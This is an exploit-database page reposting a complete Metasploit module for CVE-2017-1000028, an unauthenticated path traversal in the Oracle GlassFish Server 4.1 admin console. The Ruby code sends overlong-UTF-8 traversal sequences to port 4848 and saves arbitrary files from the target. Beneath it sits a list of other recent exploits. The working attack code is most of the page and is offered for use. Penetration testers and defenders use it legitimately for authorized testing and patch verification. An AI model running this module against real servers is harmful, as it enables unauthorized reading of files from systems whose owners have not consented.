Oracle glassfish ose 4.1 path traversal (metasploit) Vulnerability / Exploit

  /     /     /  

Exploits / Vulnerability Discovered : 2018-08-14 | Type : webapps | Platform : linux
This exploit / vulnerability Oracle glassfish ose 4.1 path traversal (metasploit) is for educational purposes only and if it is used you will do on your own risk!

[+] Code ...

# Exploit title: Oracle Glassfish OSE 4.1 - Path Traversal (Metasploit)
# Author: Dhiraj Mishra
# Date: 2018-08-14
# Software: Oracle Glassfish Server OSE
# Version: 4.1
# Software link: http://download.oracle.com/glassfish/4.1/release/glassfish-4.1.zip
# CVE: 2017-1000028

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::Auxiliary::Scanner
include Msf::Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'Path Traversal in Oracle GlassFish Server Open Source Edition',
'Description' => %q{
This module exploits an unauthenticated directory traversal vulnerability
which exits in administration console of Oracle GlassFish Server 4.1, which is
listening by default on port 4848/TCP.
},
'References' =>
[
['CVE', '2017-1000028'],
['URL', 'https://www.trustwave.com/Resources/Security-Advisories/Advisories/TWSL2015-016/?fid=6904'],
['EDB', '39441']
],
'Author' =>
[
'Trustwave SpiderLabs', # Vulnerability discovery
'Dhiraj Mishra' # Metasploit module
],
'DisclosureDate' => 'Aug 08 2015',
'License' => MSF_LICENSE
))

register_options(
[
Opt::RPORT(4848),
OptString.new('FILEPATH', [true, "The path to the file to read", '/windows/win.ini']),
OptInt.new('DEPTH', [ true, 'Depth for Path Traversal', 13 ])
])
end

def run_host(ip)
filename = datastore['FILEPATH']
traversal = "%c0%af.." * datastore['DEPTH'] << filename

res = send_request_raw({
'method' => 'GET',
'uri' => "/theme/META-INF/prototype#{traversal}"
})

unless res && res.code == 200
print_error('Nothing was downloaded')
return
end

vprint_good("#{peer} - #{res.body}")
path = store_loot(
'oracle.traversal',
'text/plain',
ip,
res.body,
filename
)
print_good("File saved in: #{path}")
end
end

Oracle glassfish ose 4.1 path traversal (metasploit)


Last added Exploits Vulnerabilities

▸ soplanning 1.52.01 (simple online planning tool) - remote code execution (rce) (authenticated) ◂
Discovered: 2024-11-15
Type: webapps
Platform: php
▸ rengine 2.2.0 - command injection (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: multiple
▸ opensis 9.1 - sqli (authenticated) ◂
Discovered: 2024-10-01
Type: webapps
Platform: php



Tags:
Oracle glassfish ose 4.1 path traversal (metasploit) Vulnerability / Exploit